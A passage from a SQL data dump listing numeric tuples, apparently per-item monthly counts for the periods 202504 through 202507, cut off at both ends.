202504',2),(5310,2,'202504',2),(5314,2,'202504',2),(5320,2,'202504',2),(5363,2,'202504',2),(477,2,'202504',3),(487,2,'202504',3),(1598,2,'202504',3),(1604,2,'202504',3),(1737,2,'202504',3),(1747,2,'202504',3),(1772,2,'202504',3),(2804,2,'202504',3),(2809,2,'202504',3),(2956,2,'202504',3),(2965,2,'202504',3),(3045,2,'202504',3),(3097,2,'202504',3),(3124,2,'202504',3),(3249,2,'202504',3),(3257,2,'202504',3),(3259,2,'202504',3),(3267,2,'202504',3),(3307,2,'202504',3),(3531,2,'202504',3),(3721,2,'202504',3),(3727,2,'202504',3),(3752,2,'202504',3),(3774,2,'202504',3),(4377,2,'202504',3),(4382,2,'202504',3),(4428,2,'202504',3),(4514,2,'202504',3),(4529,2,'202504',3),(4651,2,'202504',3),(4697,2,'202504',3),(4741,2,'202504',3),(4744,2,'202504',3),(4888,2,'202504',3),(4897,2,'202504',3),(4930,2,'202504',3),(5028,2,'202504',3),(5033,2,'202504',3),(5042,2,'202504',3),(5248,2,'202504',3),(5256,2,'202504',3),(5280,2,'202504',3),(5307,2,'202504',3),(5323,2,'202504',3),(106,2,'202504',4),(108,2,'202504',4),(110,2,'202504',4),(482,2,'202504',4),(483,2,'202504',4),(485,2,'202504',4),(1705,2,'202504',4),(1715,2,'202504',4),(1732,2,'202504',4),(1743,2,'202504',4),(1751,2,'202504',4),(1774,2,'202504',4),(2152,2,'202504',4),(2769,2,'202504',4),(2775,2,'202504',4),(3041,2,'202504',4),(3092,2,'202504',4),(3127,2,'202504',4),(3287,2,'202504',4),(3313,2,'202504',4),(3710,2,'202504',4),(3749,2,'202504',4),(4238,2,'202504',4),(4335,2,'202504',4),(4368,2,'202504',4),(4387,2,'202504',4),(4440,2,'202504',4),(4517,2,'202504',4),(4587,2,'202504',4),(4660,2,'202504',4),(4663,2,'202504',4),(4677,2,'202504',4),(4681,2,'202504',4),(4691,2,'202504',4),(4712,2,'202504',4),(4722,2,'202504',4),(4750,2,'202504',4),(4753,2,'202504',4),(4756,2,'202504',4),(4762,2,'202504',4),(4893,2,'202504',4),(5153,2,'202504',4),(5268,2,'202504',4),(5271,2,'202504',4),(5289,2,'202504',4),(5301,2,'202504',4),(5317,2,'202504',4),(5356,2,'202504',4),(102,2,'202504',5),(469,2,'202504',5),(1594,2,'202504',5),(1610,2,'202504',5),(1695,2,'202504',5),(1699,2,'202504',5),(1713,2,'202504',5),(1722,2,'202504',5),(1728,2,'202504',5),(1730,2,'202504',5),(2148,2,'202504',5),(2248,2,'202504',5),(2293,2,'202504',5),(2989,2,'202504',5),(3087,2,'202504',5),(3090,2,'202504',5),(3253,2,'202504',5),(3278,2,'202504',5),(3316,2,'202504',5),(3438,2,'202504',5),(3534,2,'202504',5),(3541,2,'202504',5),(3742,2,'202504',5),(3777,2,'202504',5),(4408,2,'202504',5),(4556,2,'202504',5),(4792,2,'202504',5),(4866,2,'202504',5),(5046,2,'202504',5),(5080,2,'202504',5),(5125,2,'202504',5),(5131,2,'202504',5),(5134,2,'202504',5),(5137,2,'202504',5),(5140,2,'202504',5),(5276,2,'202504',5),(5304,2,'202504',5),(84,2,'202504',6),(87,2,'202504',6),(472,2,'202504',6),(480,2,'202504',6),(1544,2,'202504',6),(1703,2,'202504',6),(1709,2,'202504',6),(1734,2,'202504',6),(1778,2,'202504',6),(1782,2,'202504',6),(2161,2,'202504',6),(2178,2,'202504',6),(2297,2,'202504',6),(3030,2,'202504',6),(3034,2,'202504',6),(3069,2,'202504',6),(3109,2,'202504',6),(3229,2,'202504',6),(3245,2,'202504',6),(3280,2,'202504',6),(4436,2,'202504',6),(4645,2,'202504',6),(4768,2,'202504',6),(5020,2,'202504',6),(5157,2,'202504',6),(5295,2,'202504',6),(5353,2,'202504',6),(335,2,'202504',7),(467,2,'202504',7),(474,2,'202504',7),(476,2,'202504',7),(486,2,'202504',7),(488,2,'202504',7),(1584,2,'202504',7),(1701,2,'202504',7),(1718,2,'202504',7),(1726,2,'202504',7),(1780,2,'202504',7),(2252,2,'202504',7),(2751,2,'202504',7),(2904,2,'202504',7),(3027,2,'202504',7),(3083,2,'202504',7),(3240,2,'202504',7),(3263,2,'202504',7),(3273,2,'202504',7),(3275,2,'202504',7),(3285,2,'202504',7),(3498,2,'202504',7),(3724,2,'202504',7),(4338,2,'202504',7),(4341,2,'202504',7),(4363,2,'202504',7),(4648,2,'202504',7),(4668,2,'202504',7),(4776,2,'202504',7),(4988,2,'202504',7),(5024,2,'202504',7),(5037,2,'202504',7),(5054,2,'202504',7),(5128,2,'202504',7),(5330,2,'202504',7),(5334,2,'202504',7),(5374,2,'202504',7),(76,2,'202504',8),(91,2,'202504',8),(471,2,'202504',8),(481,2,'202504',8),(1588,2,'202504',8),(1776,2,'202504',8),(2503,2,'202504',8),(2993,2,'202504',8),(3063,2,'202504',8),(3117,2,'202504',8),(3251,2,'202504',8),(3265,2,'202504',8),(3489,2,'202504',8),(3738,2,'202504',8),(3746,2,'202504',8),(4301,2,'202504',8),(4329,2,'202504',8),(4332,2,'202504',8),(4391,2,'202504',8),(4400,2,'202504',8),(4432,2,'202504',8),(4657,2,'202504',8),(4674,2,'202504',8),(4694,2,'202504',8),(4771,2,'202504',8),(4858,2,'202504',8),(4874,2,'202504',8),(4976,2,'202504',8),(5071,2,'202504',8),(5264,2,'202504',8),(74,2,'202504',9),(1592,2,'202504',9),(1614,2,'202504',9),(1770,2,'202504',9),(2801,2,'202504',9),(3290,2,'202504',9),(3482,2,'202504',9),(3771,2,'202504',9),(4396,2,'202504',9),(4416,2,'202504',9),(4524,2,'202504',9),(4542,2,'202504',9),(4551,2,'202504',9),(4566,2,'202504',9),(5259,2,'202504',9),(478,2,'202504',10),(1606,2,'202504',10),(2558,2,'202504',10),(2911,2,'202504',10),(3104,2,'202504',10),(3107,2,'202504',10),(3226,2,'202504',10),(5101,2,'202504',10),(89,2,'202504',11),(468,2,'202504',11),(470,2,'202504',11),(484,2,'202504',11),(1739,2,'202504',11),(1749,2,'202504',11),(2159,2,'202504',11),(2813,2,'202504',11),(2991,2,'202504',11),(3004,2,'202504',11),(3006,2,'202504',11),(3079,2,'202504',11),(4996,2,'202504',11),(479,2,'202504',12),(2457,2,'202504',12),(2658,2,'202504',12),(3023,2,'202504',12),(4759,2,'202504',12),(1711,2,'202504',13),(3261,2,'202504',13),(570,2,'202504',14),(1600,2,'202504',14),(2165,2,'202504',14),(3005,2,'202504',14),(3072,2,'202504',14),(4454,2,'202504',14),(1612,2,'202504',15),(1724,2,'202504',15),(2309,2,'202504',15),(3243,2,'202504',15),(3247,2,'202504',15),(4275,2,'202504',15),(5076,2,'202504',15),(1608,2,'202504',16),(1602,2,'202504',17),(2154,2,'202504',17),(3731,2,'202504',17),(72,2,'202504',19),(3066,2,'202504',19),(2617,2,'202504',20),(473,2,'202504',22),(2609,2,'202504',22),(4420,2,'202504',22),(3764,2,'202504',23),(1582,2,'202504',27),(4412,2,'202504',27),(1766,2,'202504',33),(1586,2,'202504',36),(1596,2,'202504',41),(3060,2,'202504',41),(3781,2,'202504',66),(80,2,'202504',113),(68,2,'202504',139),(9,2,'202504',149934),(106,2,'202505',11),(110,2,'202505',11),(4368,2,'202505',13),(4883,2,'202505',13),(4363,2,'202505',14),(4382,2,'202505',14),(4792,2,'202505',14),(4802,2,'202505',14),(5028,2,'202505',14),(5163,2,'202505',14),(5248,2,'202505',14),(1610,2,'202505',15),(3240,2,'202505',15),(4357,2,'202505',15),(4412,2,'202505',15),(4428,2,'202505',15),(4587,2,'202505',15),(4709,2,'202505',15),(4858,2,'202505',15),(5020,2,'202505',15),(5024,2,'202505',15),(5042,2,'202505',15),(102,2,'202505',16),(1705,2,'202505',16),(2148,2,'202505',16),(2154,2,'202505',16),(2617,2,'202505',16),(3092,2,'202505',16),(3269,2,'202505',16),(4373,2,'202505',16),(4404,2,'202505',16),(4741,2,'202505',16),(4862,2,'202505',16),(4874,2,'202505',16),(4897,2,'202505',16),(5033,2,'202505',16),(5037,2,'202505',16),(5046,2,'202505',16),(5378,2,'202505',16),(1697,2,'202505',17),(1713,2,'202505',17),(1718,2,'202505',17),(2161,2,'202505',17),(2751,2,'202505',17),(3245,2,'202505',17),(3746,2,'202505',17),(4387,2,'202505',17),(4396,2,'202505',17),(4408,2,'202505',17),(4681,2,'202505',17),(4700,2,'202505',17),(4706,2,'202505',17),(4797,2,'202505',17),(4866,2,'202505',17),(5050,2,'202505',17),(5067,2,'202505',17),(5146,2,'202505',17),(5253,2,'202505',17),(5363,2,'202505',17),(1711,2,'202505',18),(1747,2,'202505',18),(1782,2,'202505',18),(2063,2,'202505',18),(2964,2,'202505',18),(3096,2,'202505',18),(3287,2,'202505',18),(3749,2,'202505',18),(3752,2,'202505',18),(4391,2,'202505',18),(4432,2,'202505',18),(4436,2,'202505',18),(4668,2,'202505',18),(4674,2,'202505',18),(4722,2,'202505',18),(4983,2,'202505',18),(5062,2,'202505',18),(5259,2,'202505',18),(5264,2,'202505',18),(5271,2,'202505',18),(5330,2,'202505',18),(1739,2,'202505',19),(1766,2,'202505',19),(2152,2,'202505',19),(2248,2,'202505',19),(2748,2,'202505',19),(3034,2,'202505',19),(3229,2,'202505',19),(3249,2,'202505',19),(3251,2,'202505',19),(3259,2,'202505',19),(3263,2,'202505',19),(3275,2,'202505',19),(3285,2,'202505',19),(3479,2,'202505',19),(3721,2,'202505',19),(3738,2,'202505',19),(3771,2,'202505',19),(4326,2,'202505',19),(4329,2,'202505',19),(4377,2,'202505',19),(4440,2,'202505',19),(4551,2,'202505',19),(4608,2,'202505',19),(4612,2,'202505',19),(4688,2,'202505',19),(4691,2,'202505',19),(4747,2,'202505',19),(4756,2,'202505',19),(4977,2,'202505',19),(5054,2,'202505',19),(5058,2,'202505',19),(5080,2,'202505',19),(5310,2,'202505',19),(5317,2,'202505',19),(482,2,'202505',20),(1590,2,'202505',20),(1695,2,'202505',20),(1732,2,'202505',20),(1734,2,'202505',20),(1737,2,'202505',20),(1772,2,'202505',20),(2156,2,'202505',20),(2965,2,'202505',20),(3104,2,'202505',20),(3271,2,'202505',20),(3278,2,'202505',20),(3297,2,'202505',20),(3313,2,'202505',20),(3531,2,'202505',20),(3727,2,'202505',20),(4323,2,'202505',20),(4335,2,'202505',20),(4416,2,'202505',20),(4424,2,'202505',20),(4457,2,'202505',20),(4517,2,'202505',20),(4546,2,'202505',20),(4677,2,'202505',20),(4694,2,'202505',20),(4703,2,'202505',20),(4712,2,'202505',20),(4759,2,'202505',20),(4870,2,'202505',20),(4878,2,'202505',20),(4888,2,'202505',20),(4976,2,'202505',20),(5071,2,'202505',20),(5122,2,'202505',20),(5125,2,'202505',20),(5153,2,'202505',20),(5289,2,'202505',20),(5326,2,'202505',20),(479,2,'202505',21),(1544,2,'202505',21),(1701,2,'202505',21),(1703,2,'202505',21),(1722,2,'202505',21),(1749,2,'202505',21),(1774,2,'202505',21),(1780,2,'202505',21),(2150,2,'202505',21),(2252,2,'202505',21),(2293,2,'202505',21),(2804,2,'202505',21),(3004,2,'202505',21),(3072,2,'202505',21),(3090,2,'202505',21),(3107,2,'202505',21),(3243,2,'202505',21),(3257,2,'202505',21),(3261,2,'202505',21),(3282,2,'202505',21),(3307,2,'202505',21),(3316,2,'202505',21),(3430,2,'202505',21),(3482,2,'202505',21),(3714,2,'202505',21),(3777,2,'202505',21),(4341,2,'202505',21),(4444,2,'202505',21),(4454,2,'202505',21),(4591,2,'202505',21),(4654,2,'202505',21),(4657,2,'202505',21),(4663,2,'202505',21),(4744,2,'202505',21),(4765,2,'202505',21),(4996,2,'202505',21),(5101,2,'202505',21),(5383,2,'202505',21),(1584,2,'202505',22),(1602,2,'202505',22),(1720,2,'202505',22),(1743,2,'202505',22),(1751,2,'202505',22),(1770,2,'202505',22),(3005,2,'202505',22),(3006,2,'202505',22),(3027,2,'202505',22),(3079,2,'202505',22),(3083,2,'202505',22),(3109,2,'202505',22),(3226,2,'202505',22),(3253,2,'202505',22),(3273,2,'202505',22),(3280,2,'202505',22),(3541,2,'202505',22),(3731,2,'202505',22),(3735,2,'202505',22),(4238,2,'202505',22),(4529,2,'202505',22),(4566,2,'202505',22),(4660,2,'202505',22),(4685,2,'202505',22),(4771,2,'202505',22),(5128,2,'202505',22),(5276,2,'202505',22),(5295,2,'202505',22),(5298,2,'202505',22),(5307,2,'202505',22),(5374,2,'202505',22),(477,2,'202505',23),(478,2,'202505',23),(483,2,'202505',23),(570,2,'202505',23),(1596,2,'202505',23),(1600,2,'202505',23),(1709,2,'202505',23),(1778,2,'202505',23),(2165,2,'202505',23),(2296,2,'202505',23),(2989,2,'202505',23),(2993,2,'202505',23),(3045,2,'202505',23),(3069,2,'202505',23),(3265,2,'202505',23),(3267,2,'202505',23),(3724,2,'202505',23),(3774,2,'202505',23),(4275,2,'202505',23),(4338,2,'202505',23),(4514,2,'202505',23),(4753,2,'202505',23),(4893,2,'202505',23),(4980,2,'202505',23),(4988,2,'202505',23),(5134,2,'202505',23),(5140,2,'202505',23),(5268,2,'202505',23),(5320,2,'202505',23),(5323,2,'202505',23),(476,2,'202505',24),(484,2,'202505',24),(1588,2,'202505',24),(1598,2,'202505',24),(1604,2,'202505',24),(1728,2,'202505',24),(1730,2,'202505',24),(1776,2,'202505',24),(2159,2,'202505',24),(2609,2,'202505',24),(2956,2,'202505',24),(3041,2,'202505',24),(3063,2,'202505',24),(3066,2,'202505',24),(3097,2,'202505',24),(3486,2,'202505',24),(3742,2,'202505',24),(4542,2,'202505',24),(5137,2,'202505',24),(485,2,'202505',25),(1594,2,'202505',25),(1614,2,'202505',25),(1715,2,'202505',25),(1741,2,'202505',25),(2297,2,'202505',25),(2704,2,'202505',25),(2801,2,'202505',25),(2991,2,'202505',25),(3087,2,'202505',25),(3102,2,'202505',25),(3710,2,'202505',25),(4520,2,'202505',25),(4582,2,'202505',25),(4651,2,'202505',25),(4762,2,'202505',25),(4768,2,'202505',25),(5301,2,'202505',25),(5304,2,'202505',25),(5314,2,'202505',25),(471,2,'202505',26),(472,2,'202505',26),(1606,2,'202505',26),(1724,2,'202505',26),(2775,2,'202505',26),(3117,2,'202505',26),(3124,2,'202505',26),(4400,2,'202505',26),(4524,2,'202505',26),(4645,2,'202505',26),(4750,2,'202505',26),(5280,2,'202505',26),(5292,2,'202505',26),(469,2,'202505',27),(480,2,'202505',27),(1608,2,'202505',27),(1707,2,'202505',27),(1745,2,'202505',27),(2178,2,'202505',27),(2457,2,'202505',27),(2809,2,'202505',27),(2911,2,'202505',27),(3030,2,'202505',27),(3038,2,'202505',27),(3534,2,'202505',27),(3764,2,'202505',27),(4332,2,'202505',27),(4420,2,'202505',27),(4697,2,'202505',27),(5131,2,'202505',27),(5157,2,'202505',27),(5256,2,'202505',27),(481,2,'202505',28),(486,2,'202505',28),(1612,2,'202505',28),(1699,2,'202505',28),(1768,2,'202505',28),(2309,2,'202505',28),(2558,2,'202505',28),(2769,2,'202505',28),(3127,2,'202505',28),(3290,2,'202505',28),(4556,2,'202505',28),(4648,2,'202505',28),(467,2,'202505',29),(2658,2,'202505',29),(4301,2,'202505',29),(488,2,'202505',30),(1726,2,'202505',30),(2813,2,'202505',30),(5076,2,'202505',30),(5353,2,'202505',30),(3438,2,'202505',31),(3489,2,'202505',31),(4448,2,'202505',31),(3247,2,'202505',32),(1592,2,'202505',33),(5356,2,'202505',33),(1586,2,'202505',34),(5359,2,'202505',34),(3023,2,'202505',35),(5436,2,'202505',38),(5433,2,'202505',40),(5420,2,'202505',42),(1582,2,'202505',49),(5412,2,'202505',49),(473,2,'202505',51),(3498,2,'202505',52),(5334,2,'202505',53),(487,2,'202505',54),(74,2,'202505',55),(468,2,'202505',56),(470,2,'202505',56),(4776,2,'202505',57),(4930,2,'202505',60),(5400,2,'202505',63),(84,2,'202505',66),(87,2,'202505',68),(108,2,'202505',68),(5409,2,'202505',75),(5397,2,'202505',79),(91,2,'202505',87),(3781,2,'202505',106),(5425,2,'202505',109),(72,2,'202505',111),(89,2,'202505',115),(2904,2,'202505',118),(335,2,'202505',119),(2503,2,'202505',129),(474,2,'202505',131),(3060,2,'202505',135),(76,2,'202505',144),(5415,2,'202505',169),(5406,2,'202505',259),(5428,2,'202505',271),(68,2,'202505',278),(80,2,'202505',354),(9,2,'202505',24546),(2296,2,'202506',11),(5472,2,'202506',12),(106,2,'202506',13),(2293,2,'202506',17),(3247,2,'202506',17),(4797,2,'202506',17),(5467,2,'202506',17),(110,2,'202506',18),(3269,2,'202506',18),(4412,2,'202506',18),(3261,2,'202506',19),(3273,2,'202506',19),(4363,2,'202506',19),(4436,2,'202506',19),(4706,2,'202506',19),(3249,2,'202506',20),(4368,2,'202506',20),(4759,2,'202506',20),(1695,2,'202506',21),(2152,2,'202506',21),(3259,2,'202506',21),(3267,2,'202506',21),(3278,2,'202506',21),(4238,2,'202506',21),(4668,2,'202506',21),(4802,2,'202506',21),(4883,2,'202506',21),(5020,2,'202506',21),(5028,2,'202506',21),(2156,2,'202506',22),(3738,2,'202506',22),(4332,2,'202506',22),(4382,2,'202506',22),(4396,2,'202506',22),(4416,2,'202506',22),(4428,2,'202506',22),(4685,2,'202506',22),(4858,2,'202506',22),(4870,2,'202506',22),(4878,2,'202506',22),(1715,2,'202506',23),(2154,2,'202506',23),(2161,2,'202506',23),(2993,2,'202506',23),(3087,2,'202506',23),(3240,2,'202506',23),(3257,2,'202506',23),(3280,2,'202506',23),(3727,2,'202506',23),(4326,2,'202506',23),(4338,2,'202506',23),(4357,2,'202506',23),(4404,2,'202506',23),(4408,2,'202506',23),(4440,2,'202506',23),(4691,2,'202506',23),(4897,2,'202506',23),(1697,2,'202506',24),(1713,2,'202506',24),(1718,2,'202506',24),(1730,2,'202506',24),(1739,2,'202506',24),(1743,2,'202506',24),(1772,2,'202506',24),(2063,2,'202506',24),(2148,2,'202506',24),(3107,2,'202506',24),(3251,2,'202506',24),(3307,2,'202506',24),(3731,2,'202506',24),(4517,2,'202506',24),(4688,2,'202506',24),(5033,2,'202506',24),(5122,2,'202506',24),(1705,2,'202506',25),(1720,2,'202506',25),(2159,2,'202506',25),(2748,2,'202506',25),(3263,2,'202506',25),(3265,2,'202506',25),(3285,2,'202506',25),(3531,2,'202506',25),(3746,2,'202506',25),(4329,2,'202506',25),(4335,2,'202506',25),(4387,2,'202506',25),(4608,2,'202506',25),(4612,2,'202506',25),(4681,2,'202506',25),(4722,2,'202506',25),(4893,2,'202506',25),(483,2,'202506',26),(1707,2,'202506',26),(1747,2,'202506',26),(2252,2,'202506',26),(2617,2,'202506',26),(3034,2,'202506',26),(3079,2,'202506',26),(3245,2,'202506',26),(3253,2,'202506',26),(3749,2,'202506',26),(4444,2,'202506',26),(4454,2,'202506',26),(4514,2,'202506',26),(4542,2,'202506',26),(4645,2,'202506',26),(4657,2,'202506',26),(4677,2,'202506',26),(4700,2,'202506',26),(4744,2,'202506',26),(4866,2,'202506',26),(5125,2,'202506',26),(5163,2,'202506',26),(1726,2,'202506',27),(1732,2,'202506',27),(2989,2,'202506',27),(3127,2,'202506',27),(3243,2,'202506',27),(3735,2,'202506',27),(4432,2,'202506',27),(4654,2,'202506',27),(4694,2,'202506',27),(4703,2,'202506',27),(4862,2,'202506',27),(5024,2,'202506',27),(5050,2,'202506',27),(5062,2,'202506',27),(1724,2,'202506',28),(1737,2,'202506',28),(1745,2,'202506',28),(2165,2,'202506',28),(2751,2,'202506',28),(3109,2,'202506',28),(3275,2,'202506',28),(4448,2,'202506',28),(4546,2,'202506',28),(4551,2,'202506',28),(4741,2,'202506',28),(4747,2,'202506',28),(4792,2,'202506',28),(5042,2,'202506',28),(5253,2,'202506',28),(1699,2,'202506',29),(1703,2,'202506',29),(1741,2,'202506',29),(2297,2,'202506',29),(3038,2,'202506',29),(3072,2,'202506',29),(3287,2,'202506',29),(3710,2,'202506',29),(3721,2,'202506',29),(4275,2,'202506',29),(4373,2,'202506',29),(4391,2,'202506',29),(4663,2,'202506',29),(4712,2,'202506',29),(4874,2,'202506',29),(4888,2,'202506',29),(5037,2,'202506',29),(5264,2,'202506',29),(485,2,'202506',30),(1709,2,'202506',30),(2248,2,'202506',30),(3005,2,'202506',30),(3124,2,'202506',30),(3229,2,'202506',30),(3316,2,'202506',30),(3430,2,'202506',30),(3438,2,'202506',30),(3479,2,'202506',30),(3541,2,'202506',30),(3724,2,'202506',30),(4341,2,'202506',30),(4424,2,'202506',30),(4709,2,'202506',30),(5128,2,'202506',30),(482,2,'202506',31),(1711,2,'202506',31),(1722,2,'202506',31),(1728,2,'202506',31),(1751,2,'202506',31),(1774,2,'202506',31),(1776,2,'202506',31),(2658,2,'202506',31),(2964,2,'202506',31),(3096,2,'202506',31),(3104,2,'202506',31),(3271,2,'202506',31),(3282,2,'202506',31),(3482,2,'202506',31),(3486,2,'202506',31),(4377,2,'202506',31),(5137,2,'202506',31),(5271,2,'202506',31),(5378,2,'202506',31),(478,2,'202506',32),(1749,2,'202506',32),(1782,2,'202506',32),(3006,2,'202506',32),(3313,2,'202506',32),(3714,2,'202506',32),(3774,2,'202506',32),(3777,2,'202506',32),(4400,2,'202506',32),(4457,2,'202506',32),(4651,2,'202506',32),(4697,2,'202506',32),(4765,2,'202506',32),(4771,2,'202506',32),(5080,2,'202506',32),(5153,2,'202506',32),(5295,2,'202506',32),(5298,2,'202506',32),(5323,2,'202506',32),(5374,2,'202506',32),(5383,2,'202506',32),(1590,2,'202506',33),(1734,2,'202506',33),(2178,2,'202506',33),(2457,2,'202506',33),(3764,2,'202506',33),(4660,2,'202506',33),(4753,2,'202506',33),(570,2,'202506',34),(1594,2,'202506',34),(2609,2,'202506',34),(3004,2,'202506',34),(3045,2,'202506',34),(3534,2,'202506',34),(3752,2,'202506',34),(4983,2,'202506',34),(5046,2,'202506',34),(5101,2,'202506',34),(5131,2,'202506',34),(5146,2,'202506',34),(102,2,'202506',35),(481,2,'202506',35),(1614,2,'202506',35),(1770,2,'202506',35),(2558,2,'202506',35),(3063,2,'202506',35),(3097,2,'202506',35),(3742,2,'202506',35),(4762,2,'202506',35),(4768,2,'202506',35),(4988,2,'202506',35),(4996,2,'202506',35),(5054,2,'202506',35),(5058,2,'202506',35),(5067,2,'202506',35),(5134,2,'202506',35),(5276,2,'202506',35),(5280,2,'202506',35),(5289,2,'202506',35),(5292,2,'202506',35),(5301,2,'202506',35),(5304,2,'202506',35),(484,2,'202506',36),(488,2,'202506',36),(1584,2,'202506',36),(1600,2,'202506',36),(1768,2,'202506',36),(2150,2,'202506',36),(3041,2,'202506',36),(3102,2,'202506',36),(4524,2,'202506',36),(4776,2,'202506',36),(5248,2,'202506',36),(480,2,'202506',37),(1766,2,'202506',37),(2911,2,'202506',37),(3066,2,'202506',37),(3092,2,'202506',37),(3226,2,'202506',37),(4529,2,'202506',37),(4582,2,'202506',37),(4591,2,'202506',37),(4756,2,'202506',37),(4976,2,'202506',37),(5326,2,'202506',37),(1606,2,'202506',38),(1610,2,'202506',38),(2991,2,'202506',38),(3069,2,'202506',38),(3117,2,'202506',38),(3297,2,'202506',38),(4556,2,'202506',38),(4750,2,'202506',38),(4977,2,'202506',38),(5256,2,'202506',38),(5268,2,'202506',38),(5320,2,'202506',38),(5330,2,'202506',38),(1604,2,'202506',39),(2309,2,'202506',39),(3771,2,'202506',39),(4301,2,'202506',39),(4323,2,'202506',39),(5314,2,'202506',39),(5334,2,'202506',39),(479,2,'202506',40),(2801,2,'202506',40),(5071,2,'202506',40),(5140,2,'202506',40),(5317,2,'202506',40),(5359,2,'202506',40),(471,2,'202506',41),(472,2,'202506',41),(1612,2,'202506',41),(1778,2,'202506',41),(1780,2,'202506',41),(2769,2,'202506',41),(2965,2,'202506',41),(3090,2,'202506',41),(3290,2,'202506',41),(3489,2,'202506',41),(5310,2,'202506',41),(486,2,'202506',42),(1701,2,'202506',42),(4980,2,'202506',42),(2956,2,'202506',43),(4566,2,'202506',43),(5259,2,'202506',43),(5353,2,'202506',43),(476,2,'202506',44),(477,2,'202506',44),(1586,2,'202506',44),(1544,2,'202506',45),(3083,2,'202506',45),(4520,2,'202506',45),(469,2,'202506',46),(1592,2,'202506',46),(3027,2,'202506',46),(5307,2,'202506',46),(1602,2,'202506',47),(2809,2,'202506',47),(3030,2,'202506',47),(3498,2,'202506',47),(1598,2,'202506',48),(4648,2,'202506',48),(5157,2,'202506',48),(2804,2,'202506',49),(4587,2,'202506',49),(4674,2,'202506',49),(1596,2,'202506',50),(5461,2,'202506',50),(1582,2,'202506',51),(5356,2,'202506',51),(1608,2,'202506',52),(467,2,'202506',54),(2775,2,'202506',54),(5363,2,'202506',54),(5409,2,'202506',56),(3023,2,'202506',58),(5457,2,'202506',58),(1588,2,'202506',60),(2813,2,'202506',63),(2704,2,'202506',65),(487,2,'202506',70),(5433,2,'202506',73),(5464,2,'202506',73),(470,2,'202506',75),(473,2,'202506',77),(5397,2,'202506',77),(5400,2,'202506',77),(5412,2,'202506',77),(4420,2,'202506',78),(468,2,'202506',79),(5420,2,'202506',79),(5454,2,'202506',79),(74,2,'202506',85),(474,2,'202506',86),(5449,2,'202506',86),(5076,2,'202506',93),(5415,2,'202506',98),(108,2,'202506',100),(3060,2,'202506',101),(4930,2,'202506',101),(84,2,'202506',102),(87,2,'202506',103),(5406,2,'202506',117),(5436,2,'202506',132),(3781,2,'202506',141),(5425,2,'202506',147),(5428,2,'202506',149),(2904,2,'202506',153),(91,2,'202506',154),(335,2,'202506',162),(2503,2,'202506',180),(76,2,'202506',197),(89,2,'202506',202),(5489,2,'202506',211),(5441,2,'202506',244),(72,2,'202506',257),(68,2,'202506',306),(80,2,'202506',5544),(9,2,'202506',14114),(4797,2,'202507',7),(2293,2,'202507',8),(106,2,'202507',9),(4416,2,'202507',9),(102,2,'202507',10),(2748,2,'202507',10),(3247,2,'202507',10),(3257,2,'202507',11),(4424,2,'202507',11),(4457,2,'202507',11),(1590,2,'202507',12),(2152,2,'202507',12),(4363,2,'202507',12),(4382,2,'202507',12),(4546,2,'202507',12),(4862,2,'202507',12),(5046,2,'202507',12),(2178,2,'202507',13),(2296,2,'202507',13),(3072,2,'202507',13),(3263,2,'202507',13),(3275,2,'202507',13),(4404,2,'202507',13),(4408,2,'202507',13),(4436,2,'202507',13),(4440,2,'202507',13),(4444,2,'202507',13),(4700,2,'202507',13),(4759,2,'202507',13),(4878,2,'202507',13),(5248,2,'202507',13),(1713,2,'202507',14),(1720,2,'202507',14),(1776,2,'202507',14),(2148,2,'202507',14),(2156,2,'202507',14),(2161,2,'202507',14),(3245,2,'202507',14),(3267,2,'202507',14),(3278,2,'202507',14),(4357,2,'202507',14),(4722,2,'202507',14),(4866,2,'202507',14),(4874,2,'202507',14),(5042,2,'202507',14),(5050,2,'202507',14),(5326,2,'202507',14),(483,2,'202507',15),(1724,2,'202507',15),(1749,2,'202507',15),(2159,2,'202507',15),(2457,2,'202507',15),(2751,2,'202507',15),(3041,2,'202507',15),(3092,2,'202507',15),(3109,2,'202507',15),(3265,2,'202507',15),(3269,2,'202507',15),(4338,2,'202507',15),(4396,2,'202507',15),(4412,2,'202507',15),(4448,2,'202507',15),(4802,2,'202507',15),(4858,2,'202507',15),(5076,2,'202507',15),(5080,2,'202507',15),(5323,2,'202507',15),(110,2,'202507',16),(1608,2,'202507',16),(1718,2,'202507',16),(1739,2,'202507',16),(1772,2,'202507',16),(2991,2,'202507',16),(3240,2,'202507',16),(3243,2,'202507',16),(3280,2,'202507',16),(3287,2,'202507',16),(3714,2,'202507',16),(4373,2,'202507',16),(4377,2,'202507',16),(4387,2,'202507',16),(4542,2,'202507',16),(4668,2,'202507',16),(4691,2,'202507',16),(4762,2,'202507',16),(4765,2,'202507',16),(4792,2,'202507',16),(4897,2,'202507',16),(4983,2,'202507',16),(5024,2,'202507',16),(5033,2,'202507',16),(5146,2,'202507',16),(5264,2,'202507',16),(5330,2,'202507',16),(486,2,'202507',17),(1594,2,'202507',17),(1600,2,'202507',17),(1743,2,'202507',17),(1747,2,'202507',17),(1774,2,'202507',17),(2154,2,'202507',17),(2248,2,'202507',17),(2252,2,'202507',17),(3090,2,'202507',17),(3107,2,'202507',17),(3249,2,'202507',17),(4326,2,'202507',17),(4341,2,'202507',17),(4432,2,'202507',17),(4648,2,'202507',17),(4681,2,'202507',17),(4741,2,'202507',17),(4870,2,'202507',17),(4893,2,'202507',17),(5020,2,'202507',17),(5028,2,'202507',17),(5071,2,'202507',17),(5122,2,'202507',17),(5125,2,'202507',17),(5334,2,'202507',17),(5383,2,'202507',17),(1588,2,'202507',18),(1697,2,'202507',18),(1726,2,'202507',18),(1751,2,'202507',18),(2150,2,'202507',18),(2558,2,'202507',18),(2809,2,'202507',18),(2911,2,'202507',18),(3005,2,'202507',18),(3096,2,'202507',18),(3104,2,'202507',18),(3253,2,'202507',18),(3271,2,'202507',18),(3273,2,'202507',18),(3746,2,'202507',18),(4428,2,'202507',18),(4454,2,'202507',18),(4514,2,'202507',18),(4517,2,'202507',18),(4706,2,'202507',18),(4771,2,'202507',18),(4883,2,'202507',18),(5067,2,'202507',18),(5128,2,'202507',18),(5320,2,'202507',18),(480,2,'202507',19),(481,2,'202507',19),(482,2,'202507',19),(484,2,'202507',19),(1695,2,'202507',19),(1780,2,'202507',19),(2165,2,'202507',19),(2609,2,'202507',19),(2965,2,'202507',19),(3006,2,'202507',19),(3069,2,'202507',19),(3097,2,'202507',19),(3102,2,'202507',19),(3229,2,'202507',19),(3261,2,'202507',19),(3282,2,'202507',19),(3307,2,'202507',19),(3738,2,'202507',19),(4368,2,'202507',19),(4551,2,'202507',19),(4674,2,'202507',19),(4694,2,'202507',19),(4747,2,'202507',19),(4976,2,'202507',19),(4988